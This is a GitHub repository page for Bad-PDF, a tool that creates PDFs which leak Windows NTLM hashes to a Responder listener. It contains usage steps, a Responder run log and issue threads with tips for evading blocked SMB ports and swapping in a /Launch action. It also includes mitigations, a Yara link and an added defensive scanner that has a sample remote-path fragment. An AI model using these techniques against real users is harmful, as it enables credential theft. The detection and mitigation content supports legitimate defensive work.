deepzec / bad-pdf

Steal Net-NTLM Hash using Bad-PDF

License: GNU General Public License v3.0

Python 100.00%
ntlm-hashes badpdf vulnerability ntlm-hash-extraction cve-2018-4993

bad-pdf's Introduction

Bad-Pdf

Bad-PDF creates a malicious PDF file that steals NTLM (NTLMv1/NTLMv2) hashes from Windows machines. It builds the file using the vulnerability disclosed by the Check Point research team, and reads the captured NTLM hashes with a Responder listener.

This method works on all PDF readers (any version); most EDR/endpoint solutions fail to detect this attack.

Reference : https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/

Update: 14/5/2018

Adobe has released a security update (APSB18-09) to address this vulnerability, and CVE-2018-4993 has been assigned to it.

Disclaimer:

All the code provided in this repository is for educational/research purposes only. Any actions and/or activities related to the material contained within this repository are solely your responsibility. Misuse of the code in this repository can result in criminal charges being brought against the persons in question. The author will not be held responsible in the event that criminal charges are brought against any individual misusing the code in this repository to break the law.

Dependency:

Responder/Kali Linux

Usage:

python badpdf.py

Run Bad-PDF in Kali Linux (screenshot).

Responder waiting for the NTLM hash (screenshot).

Open the generated Bad-PDF file on a Windows machine and receive the NTLM hash (screenshot) :)

Mitigations:

  • Vendor patch: none was available when this tool was released; Adobe has since addressed the issue in APSB18-09: https://helpx.adobe.com/security/products/acrobat/apsb18-09.html

  • Microsoft issued an optional security enhancement [0] late last year that lets customers disable NTLM SSO authentication as a method for public resources.

  • Block outbound (external) SMB access at the firewall to prevent NTLM hashes from leaking to the internet.

Yara Rule:

https://github.com/InQuest/yara-rules/blob/master/NTLM_Credentials_Theft_via_PDF_Files.rule
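The InQuest rule above looks for the same indicators; as an added example that is not part of Bad-PDF, the Check Point report or the InQuest rule, the following Python scanner flags PDF action dictionaries whose file specification points off-host, which is what a defender would hunt for in mail attachments. It also covers the /Launch variant mentioned in the issue tracker; the sample fragments are constructed, and 192.0.2.10 is a documentation address used as a placeholder.

```python
import re
from typing import Dict, List, Optional

# Action types that take a file specification and can make a reader open a
# file off the local host. GoToR and GoToE are the actions named in the
# Check Point report; Launch is the variant raised in the issue tracker.
ACTION_RE = re.compile(rb"/S\s*/(GoToR|GoToE|Launch)\b")
# A /F or /UF key followed by a literal (...) or hex <...> PDF string.
FILESPEC_RE = re.compile(rb"/(UF|F)\s*(?:\(((?:\\.|[^\\)])*)\)|<([0-9A-Fa-f\s]*)>)")


def decode_pdf_string(lit: Optional[bytes], hexstr: Optional[bytes]) -> bytes:
    """Raw bytes of a PDF string; only the escapes that matter for paths are handled."""
    if hexstr is not None:
        h = re.sub(rb"\s", b"", hexstr)
        return bytes.fromhex((h + b"0" if len(h) % 2 else h).decode("ascii"))
    return re.sub(rb"\\([\\()])", rb"\1", lit)


def is_remote_target(target: bytes) -> bool:
    """True when the file spec points off-host: UNC path, //host form or file: URI."""
    t = target.strip().lower()
    return t.startswith(b"\\\\") or t.startswith(b"//") or t.startswith(b"file:")


def scan_pdf_bytes(data: bytes, window: int = 512) -> List[Dict[str, str]]:
    """One finding per remote-capable action whose nearby /F or /UF is off-host.

    Like the referenced Yara rule this is a byte-level heuristic: the file spec
    may precede or follow /S inside the dictionary, so a window on both sides
    of the action name is searched. Dictionaries inside compressed object
    streams or encrypted files are invisible to it until they are decoded.
    """
    findings = []
    for m in ACTION_RE.finditer(data):
        chunk = data[max(0, m.start() - window): m.end() + window]
        for fm in FILESPEC_RE.finditer(chunk):
            target = decode_pdf_string(fm.group(2), fm.group(3))
            if is_remote_target(target):
                findings.append({"action": m.group(1).decode(), "key": fm.group(1).decode(),
                                 "target": target.decode("latin-1")})
    return findings


# Constructed fragments, not real files: a remote GoToE of the kind the Yara
# rule targets (192.0.2.10 is a documentation address) and a benign local
# GoToR that must not be flagged.
SAMPLE_REMOTE = b"<< /AA << /O << /S /GoToE /F (\\\\\\\\192.0.2.10\\\\share\\\\doc.pdf) >> >> >>"
SAMPLE_LOCAL = b"<< /S /GoToR /F (appendix.pdf) /D [0 /Fit] >>"
```

Run it over raw PDF bytes read from disk; for PDFs that use object streams, inflate them first (for example with a PDF library) or the dictionaries will not be visible to the regexes.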

Author: Deepu TV; feel free to contact me at twitter.com/DeepZec


bad-pdf's Issues

Responder Not Found

Hi,

When I try to execute the command from the Kali terminal (python bad.pdf.py), I get the error message "Responder not found". I have the Responder program installed in my usr/bin folder. Any help? Much appreciated. Thanks

I think it does not work for me :( why?

─[d3vil67@backbox]─[~/Hacking/Bad-Pdf]
└──╼ $sudo python badpdf.py

    ______                 __       _______  ______   ________  
    |_   _ \               |  ]     |_   __ \|_   _ `.|_   __  | 
      | |_) |  ,--.    .--.| | ______ | |__) | | | `. \ | |_ \_| 
      |  __'. `'_\ : / /'`' ||______||  ___/  | |  | | |  _|    
     _| |__) |// | |,| \__/  |       _| |_    _| |_.' /_| |_     
    |_______/ '-;__/ '.__.;__]     |_____|  |______.'|_____|

    By DeepZec 

    =============================================================

Responder detected :/usr/bin/responder
Please enter Bad-PDF host IP:
192.168.100.130
Please enter output file name:
titanic.pdf
Please enter the interface name to listen(Default eth0):
wlan0
[] Starting Process.. []
Bad PDF titanic.pdf created

       NBT-NS, LLMNR & MDNS Responder 2.3

Author: Laurent Gaffie ([email protected])
To kill this script hit CRTL-C

[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]

[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]

[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]

[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Fingerprint hosts [OFF]

[+] Generic Options:
Responder NIC [wlan0]
Responder IP [192.168.100.130]
Challenge set [1122334455667788]

[!] Error starting TCP server on port 80, check permissions or other servers running.
[!] Error starting SSL server on port 443, check permissions or other servers running.
[!] Error starting TCP server on port 445, check permissions or other servers running.
[!] Error starting TCP server on port 139, check permissions or other servers running.
[!] Error starting TCP server on port 1433, check permissions or other servers running.
[!] Error starting TCP server on port 88, check permissions or other servers running.
[!] Error starting TCP server on port 21, check permissions or other servers running.
[!] Error starting TCP server on port 110, check permissions or other servers running.
[!] Error starting TCP server on port 389, check permissions or other servers running.
[!] Error starting TCP server on port 25, check permissions or other servers running.
[!] Error starting TCP server on port 587, check permissions or other servers running.
[!] Error starting TCP server on port 143, check permissions or other servers running.
[+] Listening for events...
[!] Error starting TCP server on port 53, check permissions or other servers running.

Responder Not Found

"Responder not found..
Please enter responder path (Default /usr/bin/responder): "

That is what I get when I run 'python badpdf.py' as root.
I have googled and read the 'Readme'.
I am not sure what to do. Please help. Thank you

HTTP method

Is the HTTP method not available in this tool, or is it only for me? After I select eth0 it starts Responder.
This is how it should look (screenshot: bad-pdf3).

http responder server support

Blocking port 445 on a gateway is considered a best practice, which makes using Responder's SMB service less reliable. Luckily you can get the same results by using Responder's HTTP service and specifying the listener with http:/// as the /AA entry. Would it be possible to add support for this to Bad-PDF?

Non responder

Is there any possibility to use this without Responder? Just like using sct or hta.

responder issue

Hi, after creating the file, I got:
/bin/sh: 1: -I: not found

It's on the latest Kali version.

Error

I am getting an error when testing this - any help is appreciated (screenshot: error).

command not found

Hey there,
I get this result when I run the script:
[] Starting Process.. []
Bad PDF test.pdf created
/usr/bin/responder: line 2: d: command not found

Other functions can also make it

In the original report by Check Point, they use GoToR and GoToE.

In my work, Launch also works. But you may remove the /D line.

You can give it a try. : )
